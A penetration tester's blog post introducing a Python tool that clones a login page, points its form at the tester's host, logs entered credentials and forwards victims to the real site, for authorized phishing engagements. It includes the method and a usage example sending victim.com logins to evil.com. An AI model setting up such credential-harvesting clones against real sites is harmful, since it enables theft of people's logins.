Adventures in Penetration Testing: Let’s Go Phishing
Phishing and social engineering engagements are often unique to each customer, however; I often find that a customer just wants one of their web pages, like their web email sign on page, copied. This link to this phishing site is then emailed out to the victims to determine their susceptibility in clicking on the link as well as entering credentials.
The standard process is to use httrack to download a copy of the page, then modify the FORM tag to POST/GET to our phishing site, save whatever values are submitted, and redirect to the real page. This is a bit of a pain due to the process being fairly manual in nature. I know you can use something like the Social Engineering Toolkit (SET), but that can be a pain to setup and is often a little heavy duty for what my company needs.
I recently began learning Python, which I love so far by the way, and thought that this might be a good area in which I could develop something useful. So I wrote a phishing script that will take the URL you point it at and replicate it, replacing the FORM ACTION with your host, logging all entered data, and forwarding the victim on to their site (along with what they submitted).
The script does this by downloading the base HTML for the page and ensuring A, IMG, LINK, and SCRIPT SRC tags point back to the original site, while modifying the FORM ACTION tag to point back at the malicious site. This is simple in that very little is downloaded and it leaves little room for something to get messed up in the visual presentation.
The script relies on Mechanize, BeautifulSoup4, and CherryPy. These can be installed with:
easy_install mechanize beautifulsoup4 cherrypy
Some features that I would like to add include:
- Integrate with the Browser Exploitation Framework (BeEF)
- Add the ability to step through a few clicks, rather than a simple one page reflect back and then redirect
This is the first script I have written in Python, so it is probably pretty ugly to anyone with experience in the language. You can download here and enjoy with:
usage: phishme.py [-h] --phish PHISH --replace REPLACE [--port PORT] [--ssl] [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY] Automatically setup a phishing site. optional arguments: -h, --help show this help message and exit --phish PHISH the full URL to phish back to the victim (must include http(s):// (default: None) --replace REPLACE the IP/FQDN to replace FORM actions with (must include http(s):// (default: None) --port PORT the port to start the listening web server on (default: 80) --ssl enable SSL on the running port (default: 0) --sslchain SSLCHAIN certificate chain file to use when ssl option is enabled (default: chain.crt) --sslcert SSLCERT certificate file to use to use when ssl option is enabled (default: ssl.crt) --sslkey SSLKEY private key file to use to use when ssl option is enabled (default: ssl.key) Example: phishme.py --phish https://www.victim.com/login.php --replace https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt --sslkey ssl.key
Comment back for some optional features that you think would be useful for this lightweight script.
Search Posts
Security Categories
- Android
- Apache Security
- Burp
- CodeWatch
- Deadrop
- Java
- Linux
- Metasploit
- OWASP 2010 A1
- OWASP 2010 A10
- OWASP 2010 A2
- OWASP 2010 A3
- OWASP 2010 A4
- OWASP 2010 A5
- OWASP 2010 A6
- OWASP 2010 A7
- OWASP 2010 A9
- OWASP 2013 A9
- Penetration Testing
- Phishing
- PHP Security
- PowerShell
- Python
- Social Engineering
- Unix
- Windows
Top Tags
ASVS 3.1 ASVS 3.2 ASVS 3.3 ASVS 3.4 ASVS 3.5 ASVS 3.6 ASVS 3.7 ASVS 3.8 ASVS 3.9 ASVS 3.10 ASVS 3.11 ASVS 3.12 ASVS 3.13 ASVS 11.4 bcrypt Burp Suite Pro CodeWatch CryptoPP Hashcat Hyperion Java Linux Metasploit Meterpreter mimikatz msfencode msfpayload Ophcrack OWASP 2010 A1 - Injection OWASP 2010 A2 - Cross-Site Scripting (XSS) OWASP 2010 A3 - Broken Authentication and Session Management Penetration Testing Phishing PHP Powershell Python SET Shellcodeexec Social Engineering Unix Veil VirusTotal WAF Web App Pentesting Windows